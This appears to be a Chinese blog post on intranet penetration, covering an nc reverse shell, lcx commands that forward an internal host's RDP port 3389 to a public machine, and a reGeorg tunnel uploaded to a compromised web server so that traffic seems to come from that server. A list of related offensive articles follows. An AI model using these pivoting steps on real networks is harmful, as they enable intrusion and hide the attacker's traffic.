端口转发工具lcx
Web代理脚本regeorg
Shell反弹脚本nc 、VPN

  1. nc:nc首先对公网主机端口进行监听,再到内网输入公网IP,端口号,以及执行文件,比如cmd.exe,就可以成功反弹内网主机的shell

  2. 第一个是 LCX 对 windows 3389 的转发;
    第二个是 reGeorg 通过上传对应脚本(PHP/ASPX/JSP),然后全局代理进一步内网渗透;
    第三个是 EarthWorm

  3. LCX:

    1)端口转发(listen和slave成对使用 2)端口映射(tran)

    Windows版是lcx.exe,Linux版为portmap,

    lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389

    (1)首先内网主机的 3389 端口转发到具有公网ip主机的 4444 端口

    lcx.exe –listen 4444 5555

    (2)其次是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。

    此时已经把内网的3389端口转发到了公网的5555端口。可以通过127.0.0.1:5555连接到内网的远程桌面。

    还有一种情况就是3389出不了防火墙,他还有一项功能就是端口映射,你吧3389映射到一个不被限制的端口就可以直接远程桌面链接了。

  4. reGeorg+proxifier内网代理+端口转发:

    目的:攻击者A 通过web应用B 看内网主机C, 在C上查看流量发现是B访问的而非攻击者。
    步骤如下:
    第一步: 上传tunnel 文件 到 Web应用B
    第二步: 在A 上,使用reGeorgSocksProxy.py 并指定端口
    第三步: 设置自己的代理Proxifier 或者SocksCap64(本次使用的是proxifier)
    第四步: 在C上使用wireshark 查看流量信息。(当然也可以查看日志)内网端口通过http/https转发到本地,然后本地使用socks5正向代理穿透防火墙到达服务器,即是一个环路。

内网代理——常用工具相关推荐

  1. 内网渗透-常用工具免杀

    内网渗透-常用工具免杀 Mimikatz免杀 Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证.票证传递.hash传递.甚至伪造域管理凭证令牌等诸多功能.由于mimikatz的使用说明网 ...

  2. 内网渗透-内网代理穿透和内网横向移动

    内网代理穿透和内网横向移动 文章目录 内网代理穿透和内网横向移动 前言 内网代理穿透 nc termite(ew) ssh正向代理(A,B,C) msf设置路由和sock4代理访问内网流量 内网横向移 ...

  3. 内网穿透 NPS工具实现内网穿透

    内网穿透    NPS工具实现内网穿透 官网的简介 NPS是一款轻量级.高性能.功能强大的内网穿透代理服务器.目前支持tcp.udp流量转发,可支持任何tcp.udp上层协议(访问内网网站.本地支付接 ...

  4. 内网渗透----netcat工具使用

    内网渗透----netcat工具使用 一.环境准备 1.1 设备准备 1.2 软件准备 二.使用方法 一.环境准备 1.1 设备准备 这把我们直接点,使用nc进行端口转发,我们需要三台设备 靶机,ip ...

  5. 端口转发与代理工具 内网代理 内网反弹代理

    目录 一.LCX 二.nc 反弹 三.socks代理工具 四.frp 内网穿透利器 五.ngrok 内网穿透 理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主 ...

  6. 内网代理工具--reGeorg

    一.简介 reGeorg是reDuh的继承者,利用了会话层的socks5协议,效率更高结合Proxifier使用 Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工 ...

  7. 钉钉内网穿透工具——简单、快速、高效(钉钉于2022年7月21日起,不再提供内网穿透的工具服务)

    内网穿透示意图 图片取自https://help-static-aliyun-doc.aliyuncs.com/assets/img/zh-CN/9904269951/p163821.png 下载钉钉 ...

  8. 80端口攻击_内网端口转发工具的使用总结

    0x00 ew端口转发 0x01 portmap端口转发 0x02 htran端口转发 0x03 ssh端口转发 0x00 ew端口转发 环境准备 攻击机    win7(物理机) 192.168.3 ...

  9. linux 内网文件传输工具_不管你是新手PHP程序员还是大佬都要知道的PHP十大必备工具...

    1.Notepad++ 总结来说就是小而精,7.4版本的软件包只有2.9M,比一般的IDE小数十倍,但是Notepad++的功能确是很全面的,代码高亮,语法折叠,宏功能,内置支持27种编程语言,基本上 ...

  10. 内网代理穿透2:termite代理穿透

    文章目录 前言 一.基础选项用法 二.具体使用 1.建立代理节点 2.具体攻击 总结 前言 termite工具前身是ew,在复杂的内网环境他的使用很人性化.操作也是十分便捷. 程序主要分为两部分,控制 ...

最新文章

  1. 数据的规范化,归一化,标准化,正则化
  2. [Leetcode]@python 68. Text Justification
  3. [转载]LEB128格式简介(CN)
  4. Entity Framework4.0 (一)概述(EF4 的Database First方法)
  5. Cloud一分钟 | 误删生产数据库血案,顺丰高级工程师被开除;阿里巴巴暂停美国云计算扩张?阿里云总裁正式回应:“不会减少投入”...
  6. 用Netty撸一个心跳机制和断线重连!
  7. 一文了解GaussDB 200的产品架构、数据流程、组网方案、服务部署原则、企业级增强特性......
  8. 纯CSS的方法解决文字溢出与截断的问题
  9. LeetCode345. Reverse Vowels of a String
  10. python中逻辑运算_Python 逻辑运算之 'and' 和 'or'
  11. PGM:部分观测数据
  12. 甲骨文创始人埃里森的10大混蛋行为:曾翻微软垃圾堆
  13. python 遍历_python dict 两种遍历方式的比较
  14. Java 登录拦截器
  15. 基于python的ROOT-MUSIC算法
  16. linux系统点歌机 ntfs分区,嵌入式点歌机说明
  17. PGP的安装及使用,利用加密软件PGP对邮件内容进行加密和解密,保姆级教学
  18. 浅谈 Java 24个设计模式(23个GoF设计模式 + 简单工厂模式) 之 六个创建型模式...
  19. 数据结构课设:基于字符串模式匹配算法的病毒感染检测问题
  20. 用计算机绘制函数图像ppt,ppt中怎么绘制三角函数图像?

热门文章

  1. 生成条形码(jsbarcode、vue-barcode)
  2. Excel表格批量生成Word文档
  3. 网络服务器是硬盘吗,云盘与网络服务器硬盘是什么?它们一样吗?
  4. 简单分析实现运维利器---webssh终端
  5. Git遇到的问题:This is not a valid source path/URL
  6. 回顾过去三年工作中对区块链技术的一点心得
  7. SPI通信协议_02
  8. 上海个税系统代理服务器地址,上海个人所得税打印地点
  9. Alfred效率神器
  10. python网址解码_python用于url解码和中文解析的小脚本(python url decoder)